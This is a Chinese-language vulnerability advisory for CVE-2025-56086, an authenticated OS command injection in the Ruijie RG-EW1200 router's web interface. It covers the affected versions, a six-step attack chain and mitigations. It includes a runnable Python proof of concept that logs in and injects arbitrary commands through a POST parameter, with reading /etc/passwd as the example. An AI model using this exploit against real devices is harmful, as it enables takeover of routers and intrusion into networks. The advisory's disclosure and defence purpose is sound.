CVE-2025-56086 锐捷RG-EW1200路由器OS命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-56086

漏洞类型

OS命令注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Ruijie RG-EW1200 EW_3.0(1)B11P227_EW1200_11130208RG-EW1200 V1.00

漏洞概述

CVE-2025-56086是锐捷网络技术有限公司生产的RG-EW1200无线路由器中存在的一个高危安全漏洞。该漏洞为操作系统命令注入漏洞，存在于设备的Web管理界面模块中。攻击者可以通过向设备发送精心构造的POST请求，在目标设备上执行任意操作系统命令。由于该漏洞的CVSS评分达到8.8，属于高危级别，且攻击复杂度较低，无需高深技术即可实现，因此对使用该设备的用户构成严重安全威胁。攻击者成功利用此漏洞可以完全控制受影响的路由器设备，获取设备的完整控制权，进而可能进行内网渗透、数据窃取、中间人攻击等恶意行为。该漏洞影响固件版本EW_3.0(1)B11P227和EW1200_11130208等多个版本，建议相关用户尽快采取防护措施。

技术细节

该漏洞位于Ruijie RG-EW1200路由器的Web管理功能模块中，具体在文件/usr/local/lua/dev_sta/networkConnect.lua的module_get接口处理函数。漏洞产生的根本原因是应用程序在处理用户输入时，未对输入参数进行充分的安全过滤和参数化，直接将用户可控的输入拼接到系统命令执行函数中。攻击者可以在POST请求的参数中注入分号、管道符等命令分隔符，以及恶意命令语句，实现命令链的追加执行。例如，攻击者可以通过在参数中插入'; cat /etc/passwd #'等命令来读取系统敏感文件。由于该接口在设计上需要低权限认证，攻击者只需拥有设备的普通用户账户即可成功利用此漏洞。漏洞的成功利用将使攻击者以root权限在设备上执行任意命令，实现对设备的完全控制。

攻击链分析

STEP 1

步骤1

信息收集：攻击者首先识别目标设备为Ruijie RG-EW1200路由器，并确认其固件版本为受影响的EW_3.0(1)B11P227或更早版本

STEP 2

步骤2

获取访问凭证：攻击者通过默认凭证、社会工程学或其他方式获取设备的低权限用户账户

STEP 3

步骤3

构造恶意请求：攻击者构造包含命令注入payload的POST请求，利用分号、管道符等命令分隔符注入恶意命令

STEP 4

步骤4

发送漏洞利用请求：攻击者向设备的/module_get接口发送精心构造的POST请求，触发命令注入漏洞

STEP 5

步骤5

命令执行：漏洞成功利用后，注入的恶意命令以root权限在设备上执行，攻击者获得设备完全控制权

STEP 6

步骤6

持久化控制：攻击者可以部署后门、修改配置或进一步横向移动至内网其他设备

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-56086 PoC - Ruijie RG-EW1200 OS Command Injection
# Target: Ruijie RG-EW1200 Router
# Vulnerability: OS Command Injection in /module_get endpoint
# Affected: EW_3.0(1)B11P227 and earlier versions

def exploit(target_ip, username, password, command):
    """
    Exploit OS Command Injection in Ruijie RG-EW1200
    
    Args:
        target_ip: Target router IP address
        username: Valid username for authentication
        password: Valid password for authentication
        command: Command to execute on the target system
    """
    
    # Login to get session
    login_url = f"http://{target_ip}/cgi-bin/luci/api/login"
    login_data = {
        "username": username,
        "password": password
    }
    
    try:
        # Step 1: Authenticate
        session = requests.Session()
        login_response = session.post(login_url, data=login_data, timeout=10)
        
        if login_response.status_code != 200:
            print("[-] Authentication failed")
            return False
        
        # Step 2: Send malicious request with command injection
        exploit_url = f"http://{target_ip}/cgi-bin/luci/module_get"
        
        # Inject OS command using semicolon separator
        # Example: ; cat /etc/passwd #
        payload = {
            "module": "networkConnect",
            "action": "connect",
            "param": f"'; {command} #"
        }
        
        response = session.post(exploit_url, data=payload, timeout=10)
        
        print(f"[+] Exploit sent successfully")
        print(f"[+] Response: {response.text}")
        
        return True
        
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 5:
        print(f"Usage: python {sys.argv[0]} <target_ip> <username> <password> <command>")
        print(f"Example: python {sys.argv[0]} 192.168.1.1 admin admin 'cat /etc/passwd'")
        sys.exit(1)
    
    target_ip = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    command = sys.argv[4]
    
    print(f"[*] CVE-2025-56086 PoC for Ruijie RG-EW1200")
    print(f"[*] Target: {target_ip}")
    print(f"[*] Command: {command}")
    
    exploit(target_ip, username, password, command)

影响范围

Ruijie RG-EW1200 EW_3.0(1)B11P227

Ruijie RG-EW1200 EW1200_11130208

Ruijie RG-EW1200 V1.00及更早版本

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 禁止从互联网访问路由器管理界面，仅允许通过内网受信任主机访问；2) 更改默认管理凭证为强密码；3) 在防火墙或路由器上配置访问控制列表，限制对管理接口的访问；4) 监控设备日志，关注异常的POST请求模式；5) 如条件允许，考虑暂时替换为不受影响的其他品牌设备；6) 启用设备的连接数限制和异常流量检测功能。